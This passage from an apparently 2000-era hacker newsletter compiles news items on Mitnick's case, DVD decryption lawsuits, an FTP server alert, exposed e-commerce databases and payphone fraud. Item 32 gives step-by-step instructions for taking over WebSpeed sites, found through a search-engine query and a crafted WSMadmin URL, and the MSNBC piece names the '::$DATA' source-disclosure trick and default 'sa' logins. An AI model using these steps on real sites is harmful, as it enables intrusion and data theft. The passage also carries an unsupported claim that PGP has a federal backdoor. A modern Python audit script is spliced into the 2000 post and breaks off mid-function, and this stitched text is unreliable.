Following the FBI's advice, Sun estimated $80 million in losses based on the amount they paid to license the Unix operating system. Six other companies responded, using software development costs as the primary calculus of loss. The total bill came to $299,927,389.61, significantly more than the $1.5 million the government says Mitnick inflicted in repair and monitoring costs, and theft of services and the $5 million to $10 million both sides stipulated to for purposes of sentencing.

"At the beginning of this litigation, the government misrepresented to the federal judiciary, the public and the media the losses that occurred in my case," Mitnick said.

To Randolph, it all smacks of collusion. "What comes out from the e-mails that we have, is that the so-called loss figures solicited by the government were research and development costs at best, fantasy at worst," he said. "I would classify it as government manipulation of the evidence."

However, prosecutor David Schindler dismissed Randolph's claims as "silly and preposterous."

"What would be inappropriate is to tell them what dollar amount to arrive at. In terms of the methodology, in terms of what is to be included in loss amounts, that direction is something we often provide because we're aware of what components are allowable under law, and which components are not," he said.

Schindler said development costs are a valid indicator of victim loss, but acknowledges that putting a dollar figure on software can be difficult.

Mitnick claims cover-up

Mitnick and his attorney both say there's more to the story, but they can't talk about it. At Mitnick's last court appearance on July 12, the judge granted a government request that any filings relating to victim loss be sealed from the public.

"As much as the government would like to, you can't take the recipe for ice and file it under seal and have it become confidential," said Mitnick, who, along with his attorney, is challenging the confidentiality of the loss information, and asking for the motion to be unsealed. Mitnick claims he smells a cover-up.

"The government should not be permitted to bury the truth of the case from the public and the media by seeking and obtaining a protective order to essentially force me to enter a code of silence," he said.

"Our only concern, as it has been from day one, is the protection of the victims of Mitnick's crimes," prosecutor Schindler said. "Why Mitnick and his lawyers want to continue to harass, embarrass and abuse them remains a mystery to us, but it's something that we will continue to oppose vigorously."

Although the software costs are no longer being used against his client, Randolph claimed that by "manipulating the loss figures," the government raises the issue of whether even the more modest $1.5 million calculation is accurate. In the sealed motion, he's seeking an evidentiary hearing to explore the matter, and asking that Mitnick be released on a signature bond pending that hearing.

And if Mitnick winds up owing money anyway? "We're asking for sanctions that the government pay the restitution," Mitnick said, "and that the judge recommend that I be immediately designated to a halfway house for the government's misconduct in this case."

Excerpts of the Sun documents are available on the Free Kevin Web site, maintained by members of a tireless grass-roots movement that's protested the hacker's imprisonment for years.

"I'd like to sincerely thank all my friends and supporters for all the support they've given me over this long period of time," Mitnick said. "I'd like to thank them from my heart."

Kevin Poulsen writes a weekly column for ZDTV's CyberCrime.

@HWA

25.0 Hackers vs Pedophiles, taking on a new approach.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.wired.com/news/print/0,1294,33869,00.html

Hackers' New Tack on Kid Porn
by Lynn Burke

3:00 a.m. 3.Feb.2000 PST

Kent Browne used to spend most of his free time hacking Web sites, erasing hard drives, disabling servers, and knocking folks out of chat rooms.
Like many hackers, he subscribed to the classic Machiavellian argument, that the end justifies the means -- especially when the end was eradicating child pornography on the Internet.

In early December, he and some fellow hackers from New York to Australia started a group called Condemned, and announced their intention to take down child pornographers by any means necessary.

But when Browne, 41, talked to Parry Aftab, an attorney who heads the biggest and most well-known of the anti-child pornography groups -- Cyber Angels -- he had a sudden change of heart.

"She said that the one problem we would have would be with law enforcement. If they knew we were doing illegal stuff, they wouldn't touch us with a 10-foot pole," he said. "Quite frankly, I'm an older guy. I've got two kids. And I don't want to take any chances."

So now he and the rest of Condemned's loosely organized volunteers use specially designed software and good old-fashioned Internet search engines to ferret out the bad stuff and tip off federal agents in the U.S. Customs Service and the FBI.

They're not alone. Natasha Grigori and her volunteer staff at antichildporn.org have also decided to hang up their hacking shoes. At her old organization, Anti Child Porn Militia, Grigori was dedicated to the use of hacking to disable child pornography Web sites.

"We started out very angry, we started out very militant," she said.

But a trip to Def Con in Las Vegas made her change her mind. She started talking with people on the right side of the law, and they told her they supported her cause, but not her means.

"You can't stop a felony with a felony," she says now.

But the decision to go "legal" was a difficult one, and she lost most of her volunteer hackers. "Less than a dozen out of 250 stuck with us," she said. "They didn't like the idea. They just thought we could rip and tear."

Browne also says he had a hard time leaving the hacking behind, mostly because he thought it was right. "Which is more illegal? Having children's pictures on the Internet or hacking down the servers?" he asked. "Morally, I felt I was right."

But morals don't make hacking the right way to eliminate child pornography, according to Aftab, the author of The Parent's Guide to Protecting Your Children in Cyberspace. She says hacking complicates the fight and casts a cloud over groups like hers that work closely with law enforcement.

"We need help but we need the right help," she said.

When a site is taken down off the Web, it turns up somewhere else, usually within minutes, she said. And if a server is destroyed, so is the evidence of the person behind it.

"I'd frankly love to be able to do all kinds of things to these groups," she said. "You can't let your gut reaction dictate how you react to a disgusting situation."

Getting a gauge on the prevalence of child pornography is difficult. Experts say that most of the images of child pornography are downloaded from newsgroups and traded in secret email clubs. Aftab says true child pornography -- the kind that features children who are very young -- isn't very easy to stumble across on the Web. It takes some digging, she says, for her volunteers to find about 150 new sites each month.

And the reason a group like hers is necessary, she says, is that the technological savvy of the law enforcement is lacking.

"When the total technology behind the cops is that one guy uses AOL at home, it's kind of hard to do cyber-forensics," she said.

Grigori said she recently asked a federal agent to come to her office for a meeting to talk about the problem. "The one fed looked at my computer like it was a toaster," she said. "I asked him for his email address, and he said, 'I don't have a computer.'"

The former deputy chief of the Child Exploitation Unit at the Department of Justice, Robert Flores, also says the government isn't doing its part. Flores has had years of experience tracking down child pornographers and pedophiles, both online and off. But he didn't think he could get his job done as a government employee.

"I got to the point where I thought I could do more for families and kids outside of the Justice Department," he said.

Flores is now the senior counsel for the Fairfax, Virginia-based National Law Center for Children and Families, a legal resource center for child pornography.

"One of the things the Justice Department has failed to do is say that the law applies on the Internet, that the Internet is not a lawless place," he said.

The laws forbidding child pornography are fairly new. The Supreme Court first ruled in New York v. Ferber in 1982 that child pornography was not protected by the First Amendment. The decision said the government could ban sexual images with serious literary or artistic value in the interest of preventing "the harmful employment of children to make sexually explicit materials for distribution." Two years later, the justices said the government could outlaw not just the distribution but also the possession of child porn.

And it is only in the last few years that the Internet has played a role in laws and statutes governing pornography in general, and child pornography in particular.

There is currently a schism within the legal community over the definition of child pornography, and whether it should include computer-generated photographs or computer-enhanced photographs that appear to feature children engaged in sex acts, but actually contain adults.

But while the courts hammer out the issues, some say citizens shouldn't take matters into their own hands.

Flores likened the Internet community's attempt to patrol child pornography to picketers in front of a porn store. It's well-intentioned, but it won't change anything.

"My recommendation is that this is not the job for a layman, quite simply," he said. "That's why we pay taxes."

@HWA

26.0 SCRAMDISK (Windows) on the fly encryption for your data.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This isn't new, but it is a VERY good package; several of my colleagues and myself use it for sensitive material on our winboxes. The bonus is, it's free software and will offer sufficient protection of data for most users. This is especially useful for using personal data on your drives at work and hiding it from the boss, it's like having your own (secret) hard disk in your work's machine. The other uses are obvious.

A note about PGP, the latest versions have a BACKDOOR that allows federal agencies access to your data. Use an earlier version of PGP (4.2) if you want to make things harder for federal agents to access your data(!) - Ed

The walls have ears, the net has taps, the government (not just your own) IS listening and scanning your data, so protect your privacy and use PGP for sensitive emails or data transmissions, also use SSH instead of telnet for accessing your shell accounts if possible as many sites are sniffed by hackers daily. - Ed

http://www.securiteam.com/tools/ScramDisk_-_Disk_Encryption_Tool.html
5/1/2000

ScramDisk - Disk Encryption Tool

Details

Scramdisk is a program that allows the creation and use of virtual encrypted drives. Basically, you create a container file on an existing hard drive that is locked with a specific password. This container can then be mounted by the Scramdisk software, which creates a new drive letter to represent the drive. The virtual drive can then only be accessed with the correct pass phrase. Without the correct pass phrase the files on the virtual drive are totally inaccessible - even physically extracting the data will reveal nothing (since the contents are encrypted).

Once the pass phrase has been entered correctly and the drive is mounted, the new virtual drive can be used as a normal drive; files can be saved and retrieved and you can safely install applications onto the encrypted drive.

Scramdisk allows virtual disks to be stored in a number of ways:

1. In a container file on a FAT formatted hard disk.
2. On an empty partition.
3. Stored in the low bits of a WAV audio file (this is called steganography).

This last option is especially interesting, since this WAV file can be sent by e-mail or carried on a diskette without attracting too much attention (since by casual hearing the WAV file sounds like the original sound file).

Details:

Scramdisk can create virtual disks with a choice of a number of 'industry standard' encryption algorithms: Triple-DES, IDEA, MISTY1, Blowfish, TEA (either 16 or 32 rounds), and Square. It also includes a proprietary and very fast algorithm 'Summer' which is provided for minimal security applications and for compatibility with older versions of ScramDisk.

Why not use PGP?

PGP is a great program, but it doesn't allow the on-the-fly encryption of a disk's contents. Instead users have to:

1. Decrypt the existing file
2. Work on the data
3. Re-encrypt the data

The problem is, while the file is decrypted it is vulnerable to interception. Scramdisk is complementary to PGP; PGP is excellent for communication security, but is somewhat lacking in user friendliness when used for data storage security.

Flaws in the system

Scramdisk is not totally secure (and nor is any security program!). There are a number of ways an attacker may try infiltrating your system:

1. Look for applications that leak data. A very well known word-processor has an interesting bug that leaks parts of the raw contents of the disk when saving an OLE Compound Document.

2. Look for data that isn't deleted securely. Ok, everyone knows that you can undelete a file easily. Did you know that even a file that has been 'wiped' could potentially be recovered by looking at the surface of the disk? Deleted files should be securely wiped using an appropriate program (PGP v6+ contains a secure file wiping program).

3. Look for data that has leaked in other ways. Temporary files and the swap file spring to mind. These both need to be securely erased too.

4. Using Van Eck monitoring. Basically, electrical emissions from the monitor, hard drive and even keyboard can be detected and recorded from a distance away. This may allow an eavesdropper to see what's on your screen or detect your pass phrase as you type it.

5. Brute Forcing. This can happen in a number of ways: they can try brute-forcing your pass phrase (it's important to use a large pass phrase that isn't easily guessed; it helps to use both upper and lower case and numbers as well) or they can try to brute force the algorithm. This is hard work (and will take around 2^127 operations with most of the ciphers included with ScramDisk - DES & Summer are exceptions).

6. Some of the ciphers included may be susceptible to attacks not known about in public. The NSA/GCHQ may have a mechanism faster than brute-force of attacking the algorithms. Scramdisk does not include any weak algorithms in the original distribution (apart from Summer, which is included for backwards compatibility), but who can tell what the Intelligence Agencies can do with Blowfish, IDEA, 3DES et al?

7. Install an amended version of ScramDisk on your computer that secretly stores your pass phrase so that it can be later read by a CIA agent. (Or use a program like SKIn98 to do it!) Far fetched? Possibly, but you should be aware that this kind of attack exists. There is no real way to defend against this attack. Check the PGP signatures of the ScramDisk files against the executables on your computer, but could your copy of PGP have also been amended?

8. Beating you until you spill your pass phrase. Truth drugs also work, apparently.
The software can be downloaded free of charge from: http://www.scramdisk.clara.net/ @HWA 27.0 HNN:Jan 17: MPAA files more suits over DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hackernews.com/arch.html?011700 MPAA Files More Suits over DeCSS contributed by Project Gamma and Macki In an effort to stop further distribution of the DeCSS program the Motion Picture Association of America has filed lawsuits in federal courts. This follows similar action two weeks ago by the DVD industry association. The MPAA feels that allowing potential illegal copying of DVDs with the DeCSS the program would be a violation US copyright law. Wired http://www.wired.com/news/politics/0,1283,33680,00.html ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422893,00.html?chkpt=p1bn CNN has some interesting quotes from a Warner Home Video spokesperson regarding this hole mess. CNN - Look about halfway down http://www.cnn.com/TRANSCRIPTS/0001/11/st.00.html MPAA has a few interesting things to say as well. MPAA http://www.mpaa.org/dvd/content.htm The folks over at CopyLeft have come up with a T-shirt that has the source code to css_descramble.c printed on it. (Cool, and only $15) CopyLeft http://copyleft.net/cgi-bin/copyleft/t039.pl?1&back ** These are really neat, check em out.. - Ed 2600 has posted the story of what has happened to them since their involvement began including them being named as a defendant in the case. 2600.com http://www.2600.com/news/2000/0115.html OpenDVD.org is attempting to cover all the developments (and doing a damn good job) in this case including the scheduled injunction for January 18, 2000. OpenDVD.org http://opendvd.org/ Articles: Wired; Movie Studios File DVD Hack Suit Reuters 5:20 p.m. 14.Jan.2000 PST The seven largest US movie studios filed their own lawsuits Friday to prevent several Internet sites from distributing a program that could allow copying of DVD movies. 
     The lawsuits, filed in federal courts in New York and Connecticut,
     followed a broader lawsuit filed last month in state court in
     California by a DVD equipment manufacturers group.

     At issue is a program called DeCSS, written by a Norwegian programmer,
     that allows users to bypass the encryption scheme used on DVDs to
     prevent unauthorized copying. But many Internet users and programmers
     say the software had a simpler, less insidious goal. They said the
     program was needed to allow people to watch DVD movies on computers
     running the Linux operating system.

     The studios argued that by allowing potential illegal copying, the
     program violated US copyright law. They asked the courts to prohibit
     four people from distributing the program on their Web sites.

     A spokesman for the Motion Picture Association of America, the
     studios' lobbying group, said the Web sites involved were
     dvd-copy.com, krackdown.com and ct2600.com. Dozens of other Web sites
     have also carried either the program or source code instructions
     showing how to write the program.

     "This is a case of theft," said Jack Valenti, president of the
     association. "The posting of the de-encryption formula is no different
     from making and then distributing unauthorized keys to a department
     store."

     The people who posted the code said they had done nothing wrong,
     insisting that the program was meant to allow viewing of DVD movies
     under Linux.

     "I don't have illegal copies of movies on my site," said Shawn
     Reimerdes, a computer programmer who maintains the dvd-copy.com Web
     site. "Just posting these files shouldn't be illegal."

     Internet advocacy groups have also opposed the lawsuits, arguing that
     the posting of computer codes on a Web site is a form of speech
     protected by the First Amendment.

     "This is definitely an infringement on freedom of speech," said Shari
     Steele, director of legal services at the Electronic Frontier
     Foundation, a San Francisco-based cyber-rights advocacy group. "What
     has been done was totally legal.
     Posting of the program is legal and there are no pirated movies here."

     Chris DiBona, who promotes Linux use for VA Linux Systems, said the
     industry had refused to help create a program to play DVDs under
     Linux.

     "The whole reason this happened is because the movie industry itself
     didn't support Linux," DiBona said. "They thought they could keep this
     a secret. They failed."

     The lawsuit relied on the 1998 Millennium Digital Copyright Act, which
     outlawed the distribution of products designed to crack copyright
     protection schemes.

     "If you can't protect that which you own, then you don't own
     anything," MPAA's Valenti said.

     In the California case, the court last month turned down the
     industry's request for a temporary restraining order against a much
     wider array of defendants, many of whom had only provided a link on
     their Web page to a page containing the actual program. A hearing is
     scheduled for next week.

     Friday's lawsuits were filed by Buena Vista Pictures, a unit of Walt
     Disney, Metro-Goldwyn-Mayer, Paramount Pictures, a unit of Viacom,
     Sony's Sony Pictures Entertainment, News Corp.'s Twentieth Century Fox
     Film, Universal Studios, a unit of Seagram, and Warner Bros., a unit
     of Time Warner.

     -=-

     MPAA; 404 - sorry article vanished.

@HWA

28.0 WARftpd Security Alert (Will they EVER fix this software??)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     http://war.jgaa.com/alert/

     SECURITY ALERT - WAR FTP DAEMON ALL VERSIONS

     Updated February 4th 2000 13:30 Central European Time.

     January 5th 2000, a serious security problem with War FTP Daemon 1.70
     was reported by email. Two hours after I read the mail, a security
     alert was sent to the war-ftpd mailing list, the alt.comp.jgaa
     newsgroup and the bugtraq mailing list. The alert advised all server
     operators to take the server off-line until further notice.

     Brief overview

     War FTP Daemon 1.70:

     The bug allows unrestricted access to any file on the local machine,
     also for users that have not logged on.
     If an older ODBC driver is installed, the bug also gives users
     unlimited access to all system commands, with administrator privileges
     (this is a bug in ODBC that has been fixed in recent versions).

     The advice is to take all version 1.70 servers off-line until the
     server is upgraded!

     A bugfix (War FTP Daemon 1.71) was released January 8th 2000 14:40
     CET. This version is not completely tested yet. Please report any
     serious problems to jgaa@jgaa.com. I will fix bugs in 1.70 over the
     next few weeks to make 1.70 a little more comfortable to use while we
     wait for version 3.

     War FTP Daemon 1.67b2 and previous versions:

     The bug may give privileged users unrestricted access to some files.
     Users must be logged in, and have at least write or create
     permissions. Users can not execute commands. A bugfix was released
     less than 24 hours after I read the mail that reported the problem.

     Buffer overflow problem in 1.6*

     February 2nd 2000 there was reported a buffer-overflow problem in 1.6
     versions on BUGTRAQ. The problem does not seem to compromise the
     security, but the server can easily be crashed by remote attackers,
     after they have logged in. A fix was released February 3rd 2000, about
     an hour after I read about the problem.

     Bugfixes are released at ftp://ftp.no.jgaa.com and
     http://war.jgaa.com/alert/files

     I'm sorry for any inconveniences caused by these problems.

     General news

     War FTP Daemon 1.67. I will make a new full distribution for 1.67.
     Until this is ready, 1.65 must be installed, and then upgraded.

     War FTP Daemon 1.72 service release. I will make a service release of
     the 1.70 series in the near future. Some annoying bugs will be fixed,
     and a command-line utility to add user accounts interactively, or from
     scripts, will be released. There will also be a simple DLL wrapper
     interface for easy integration with other software.

     War FTP Daemon 3.0. The development of the next major release
     continues. 3.0 is currently running under Windows NT and Linux.
     The server is however not yet ready for alpha-testing. When all the
     basic functionality is implemented, and debugged, ftp://ftp.jgaa.com
     will open up, using version 3.0. This can be expected soon. Early
     versions for Windows 9x, Windows NT, Debian Linux and FreeBSD will be
     available for download. Version 3.0 will be Open Source, under the GNU
     Public License. http://download.jgaa.com will open when War FTP Daemon
     3.0 moves into early alpha.

     Jarle

@HWA

29.0 HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by mack

     MSNBC found seven ecommerce sites open for business with easily
     accessible customer databases. By connecting to weakly secured SQL
     databases MSNBC was able to access the personal information including
     credit card numbers of 2500 people. All of the sites have been
     informed of the problem. (And people act surprised when I tell them
     that I don't buy anything on the web.)

     MSNBC
     http://www.msnbc.com/news/357305.asp

     Stealing cards easy as Web browsing

     By Bob Sullivan
     MSNBC

     Jan. 14 — Just how easy is it to steal credit card numbers on the
     Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card
     numbers stored by seven small e-commerce Web sites within a few
     minutes, using elementary instructions provided by a source. In all
     cases, a list of customers and all their personal information was
     connected to the Internet and either was not password-protected or the
     password was viewable directly from the Web site.

     CREDIT CARD THEFT, a problem long lurking in the background of Internet
     commerce, leaped to the top of consumers’ minds earlier this month
     when a computer intruder calling himself Maxus was able to break into
     CD Universe’s database of user credit cards. There’s still speculation
     about how he did it. But perhaps Maxus didn’t have to work so hard.
     This week, MSNBC was able to view nearly 2,500 credit card numbers and
     other data essentially by browsing e-commerce Web sites using a
     commercially available database tool rather than a Web browser. Not
     only were the sites storing the credit cards in plain text in a
     database connected to the Web — the databases were using the default
     user name and in some cases, no password.

     These basic security flaws were found by a legitimate Russian software
     company named Strategy LLC, according to CEO Anatoliy Prokhorov, and
     shared with MSNBC. He says he tried contacting some of the companies
     first and got no response.

     “From our point of view this is just unprofessionalism in a very high
     degree that’s not explainable,” Prokhorov said.

     His company writes software that helps consumers compare prices across
     multiple e-commerce sites, so his developers become familiar with data
     structures at hundreds of e-commerce sites. He says they weren’t
     looking to find security flaws, but rather stumbled on these. “This is
     just a hole we passed by, an open door. Our people were amazed.”

     But security experts were not. Given the speed required to succeed in
     the fast-paced Internet economy, companies are in a big hurry to
     publish working Web sites and often skimp on security measures.

     “This is a microcosm of what’s out there,” said Elias Levy of
     SecurityFocus.com. Levy’s site was the first to report the CD Universe
     break-in last weekend. “One could only imagine what they would have
     found if they were looking for problems.... The problem is fairly
     widespread, and what Anatoliy has found is a small snapshot.”

     Prokhorov also contacted SecurityFocus.com with his information, and
     the site today will issue its own report based on its independent
     investigation.

     The security flaws Prokhorov found involve more than just
     easy-to-steal credit cards.
     At all seven sites, MSNBC was able to view a wide selection of
     personal data including billing addresses, phone numbers and in some
     cases, employee Social Security numbers.

     Prokhorov sent the list and instructions to MSNBC on Tuesday. It
     included about 20 Web sites which either had no password protection at
     all on their database servers — in each case, they were running
     Microsoft’s SQL Server software — or had password information exposed
     on their Web site. Connecting to all the sites was as simple as
     starting SQL Server and opening a connection to the Web site. (Note:
     Microsoft is a partner in MSNBC.)

     Expressmicro.com, Computerparts.com, Directmicro.com and
     Sharelogic.net — were all contacted 24 hours before this story so they
     could close the security hole.

     While the flaws are obvious, assessing blame is a much more sticky
     business. There’s a mounting concern that small businesses are
     particularly vulnerable to attack; many don’t have computer experts on
     staff. Other times, non-technically savvy business owners take lowball
     bids from developers who promise a secure Web site but don’t deliver.

     Then there are inherent problems in software itself that make flaws
     more likely. In some cases, the server-side code underlying a Web page
     is viewable if a browser places “::$DATA” at the end of the page’s Web
     address. That code, normally hidden, can contain any usernames,
     passwords and other information about any computer connected to that
     server. This flaw was revealed over two years ago and has since been
     patched. Four of the vulnerable sites MSNBC found were hosted on the
     same Web server and had not plugged this hole.

     But even without knowing that technique, an intruder could have
     entered the sites anyway — the username required for entering the
     database was the default “sa,” which stands for “system
     administrator”; the password was the name of the company.
     “We used a developer, and obviously the developer didn’t take that
     flaw into consideration,” said a spokesperson for the sites. “The flaw
     could have lied within the software, but maybe the developer should
     have taken that into consideration ... and one thing we didn’t do, we
     didn’t hire a security company to come in and test our Web site.”

     Getting a second opinion when building an e-commerce site is a good
     idea, said security expert Russ Cooper, who maintains the popular
     NTBugTraq mailing list. “Make a condition of the contract that it has
     to pass scrutiny of another individual who tests the site,” Cooper
     recommended.

     The fundamental problem, he said, is that developers have no liability
     for flaws they leave behind in e-commerce sites. Merchants are
     responsible for the cost of any stolen merchandise, while most
     developer contracts make clear they are not responsible for what
     happens with a site they build. “So a lot of people end up with a
     working site but not a secure site.”

     The other three vulnerable sites MSNBC visited simply used “sa” as the
     username for their database, and no password.

     Average consumers have no way of knowing how well-guarded their
     personal information is when they submit it to a Web site. Levy said
     the problems MSNBC found at these seven sites are hardly isolated.
     “The blame falls on more than one person. You can’t rush out to set up
     an e-commerce site regardless of how much you want to make money. ...
     Many people don’t give (security) a second thought,” he said.

     One of the fundamental flaws in all these sites — and, experts say, in
     many other sites — is the storing of private consumer information in
     the first place. While encryption techniques that scramble the data
     are available, it’s often kept on a computer in plain text — one step
     away from the Internet. While that’s more convenient, experts agree
     it’s a bad idea.
     “My advice is, if nothing else, don’t store the data where it
     physically has access to the Web,” said Wesley Wilhelm, a fraud
     prevention consultant at the Internet Fraud Prevention Advisory
     Council. “Take them off every night and make a sneakernet run.”

     As for consumers, there isn’t much they can do to ascertain how well a
     Web site is guarding their personal information. Some experts suggest
     using only one card online, and religiously checking credit card
     bills. While consumers are liable for at most $50 of fraudulent
     purchases, they are responsible for catching them and alerting their
     bank.

     MSNBC’s Curtis Von Veh contributed to this story.

@HWA

30.0 HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by tom

     It is alleged that a team of sophisticated professional electronic
     intruders have broken into twelve multinational companies and have
     issued ransom demands to prevent the release of stolen information.
     This report only names one of the companies in question, Visa, and
     says that Scotland Yard is investigating. (While it would appear that
     Visa has admitted to the intrusion we would like to know who the other
     companies are.)

     The UK Times
     http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?999

     January 16 2000 BRITAIN

     Hacker gang blackmails firms with stolen files

     Jon Ungoed-Thomas and Stan Arnaud

     A BRITISH group of hackers has broken into the computer systems of at
     least 12 multinational companies and stolen confidential files. It has
     issued ransom demands of up to £10m and is also suspected of hiring
     out its services.

     Scotland Yard is now investigating the attacks, which computer experts
     have described as the most serious systematic breach ever of
     companies' security in Britain.

     "The group is using very sophisticated techniques and has been
     exchanging information via e-mail and internet chat," said an
     investigator.
     Visa confirmed last week that it had received a ransom demand last
     month, believed to have been for £10m. "We were hacked into in
     mid-July last year," said Russ Yarrow, a company spokesman. "They
     gained access to some corporate material and we informed both Scotland
     Yard and the FBI."

     It is understood the hackers stole computer "source codes" that are
     critical to programming, and threatened to crash the entire system. If
     Visa's system crashed for just one day, the company - which handles
     nearly £1 trillion business a year from customers holding 800m Visa
     cards - could lose tens of millions of pounds.

     "We received a phone call and an e-mail to an office in England
     demanding money," Yarrow said. The company contacted police after the
     ransom demand. "We hardened the system, we sealed it and they did not
     return. We have firewalls upon firewalls, but are concerned that
     anyone got in."

     Scotland Yard's computer crime unit is now scrutinising e-mail traffic
     between several known hackers in England and Scotland. Last month
     officers from the unit flew to Hopeman, a Scottish fishing village,
     and seized equipment from the home of James Grant, who works for a
     local computer company. He has been interviewed by detectives and Visa
     security experts. It is understood that he has given a legal
     undertaking to Visa not to discuss the matter.

     "He is saying nothing at all," said his mother, Rhona. "That is a
     situation that will not change in the future."

     Grant, 20, studied computing in nearby Elgin, and now works for Data
     Converters, based in Elgin. His father is a member of the civilian
     security staff at RAF Lossiemouth air base and his mother a care
     worker.

     Detectives are studying attacks on at least 12 companies that they
     believe have been penetrated by the group and others that may be
     connected, including one within the Virgin group, in which a hacker
     tried to break into the UK mailing system.
     They believe the group may also be acting as paid specialists for
     information brokers who trade corporate secrets. "These are
     professionals and there is some evidence that suggests some of the
     activity was contracted and paid for," said a computer expert involved
     in the investigation.

     The group's success has exposed flaws in security. The internet
     company CD Universe last week confirmed it had called in the FBI after
     being blackmailed by a hacker who had copied more than 300,000 of its
     customer credit card files.

     Scotland Yard said: "There is an ongoing investigation into the
     incident involving Visa, but it is too early to speculate about the
     involvement of a group."

@HWA

31.0 HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     SUCK THIS!

     From HNN http://www.hackernews.com/

     contributed by deeeek

     Telstra (Australian Telephone Company) has to upgrade 29,000 payphones
     due to fraud involving a drinking straw. The problem affects 80% of
     the pay phones installed since 1997. No information about exactly how
     the fraud was committed was given. (A Straw? Oh, there must be a text
     file on this somewhere.)

     Fairfax IT
     http://it.fairfax.com.au/breaking/20000114/A24452-2000Jan14.html

     Scam forces Telstra to fix 29,000 pay phones

     9:17 Friday 14 January 2000
     AAP

     TELSTRA is urgently modifying 80 per cent of its public pay phones
     after a scam was discovered involving a drinking straw and free phone
     calls around the world.

     Telstra would have the 29,000 vulnerable phones rectified soon,
     Telstra's public affairs manager Michael Herskope said yesterday.

     The Spanish-manufactured coin and phone card-operated Smart pay phone
     was phased into the Australian network from 1997.

     The scam potentially cost Telstra millions of dollars in unlimited STD
     and ISD calls since then, but Telstra can only speculate.

     "We have a rough idea, but that's not something we're really going to
     publicise,'' Herskope said.
     The scam was made public on the front page of Albury-Wodonga's The
     Border Morning Mail yesterday.

     The newspaper was told by perpetrators that the low-tech scam had been
     well known since the phones were introduced as part of a $100 million
     upgrade of the public phone national network. One source said some
     people may have learnt about it from the Internet.

     The paper accompanied a man to three public phones chosen at random
     and observed him make free calls, including one to New York.

     Telstra had initially dismissed the scam as a myth, the paper said.

     But Herskope denied that Telstra only learnt of the fraud from the
     country newspaper.

     "We've known about it for a little while,'' he said. "It's pretty hard
     to articulate weeks, days. I'm not sure how it was brought to our
     attention but it certainly was.''

     He said rectifying the problem was a simple procedure. Without
     disclosing how the fraud was perpetrated, he said there was no design
     fault in the phone.

     "This particular fault will be closed off very shortly,'' he said.

@HWA

32.0 Owning sites that run WebSpeed web db software
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Source: win2k security advice mailing list.

     From: George
     To:
     Sent: Friday, February 04, 2000 7:32 PM
     Subject: Webspeed security issue leaves sites vulnerable

     I reported this to Progress (maker of Webspeed) a month ago and they
     said they would fix it but since then I've not seen any fixes
     released. I also pondered whether or not to release this information
     because some rather large web databases use Webspeed but I do believe
     in full disclosure as the best security so here goes...

     Webspeed is a website creation language used by some of the larger db
     based websites on the net. Version 3 comes with a java GUI
     configuration program. This configuration program has certain security
     setting options in it. One of which doesn't actually do anything.
     There is one option to turn off access to a utility called WSMadmin.
     It's in the messenger section of the GUI config program. However
     checking or unchecking this option doesn't change anything. In fact to
     turn this feature off you have to hand edit the ubroker.properties
     file. Look for the following entries:

         AllowMsngrCmds=1

     and each time you find this set it =0 in each of the sections. This
     will disable the feature (you want to do this on the production
     server).

         AllowMsngrCmds=0

     Ok, now the exploit to show how serious an issue this is on the web.
     It's just a misconfiguration really but it's caused by a bug in the
     java config program (I tested the NT version but since the config
     program is java it may also affect other platforms)

     Exploit:

     go to search engines and search for "wsisa.dll", I used google 3rd
     page or further (first 3 pages are all junk)

     Go to URL similar to
     http://www.domain.com/scripts/wsisa.dll/extra/somepage.htm
     with your browser

     change the url in the browser to
     http://www.domain.com/scripts/wsisa.dll/WService=anything?WSMadmin
     (note capitals are important)

     click on the link "End Sessions Logging and Display Sessions Info"
     (note you may have to start logging first then stop it if they've
     never used the logging feature)

     When you pick the End Sessions Logging choice it displays the log,
     find a statement in the log for the default service
     "Default Service = nameofservice"

     back up one page (hit your back button)

     type nameofservice into the Verify WebSpeed Configuration box and
     click the verify button.

     If everything worked you now own their site. I won't explain how to
     use the utility but anyone familiar with this should know exactly how
     dangerous this is.

     Geo.
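     One way to check a production server for the setting George describes,
     as an added example that is not part of his post and not Progress's
     own tooling: a short Python script that reads ubroker.properties,
     reports every section in which AllowMsngrCmds is still 1, and writes a
     copy with those lines set to 0. It assumes the INI-style layout the
     post implies ([section] headers and key=value lines); the section
     names and the sample file contents are constructed for the
     demonstration, not taken from a real installation.

```python
"""Audit a WebSpeed ubroker.properties file for AllowMsngrCmds=1 and rewrite
it to 0 in every section.  Added example, not part of George's post and not
Progress's own tooling.  Assumes the INI-style layout the post implies
([section] headers, key=value lines); section names and file contents below
are constructed for the demonstration."""
import re
from typing import List, Tuple

SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
KEY_RE = re.compile(r"^\s*AllowMsngrCmds\s*=\s*(\S+)\s*$")

# Constructed sample: the GUI box was 'unchecked', yet two sections still say 1.
SAMPLE_PROPERTIES = """\
[UBroker]
portNumber=3090
AllowMsngrCmds=1

[UBroker.WS.wsbroker1]
srvrExecFile=wsbroker
AllowMsngrCmds=1

[UBroker.WS.wsbroker2]
AllowMsngrCmds=0
"""


def find_enabled_sections(text: str) -> List[str]:
    """Names of the sections in which AllowMsngrCmds is set to anything but 0."""
    enabled: List[str] = []
    section = "(no section)"
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
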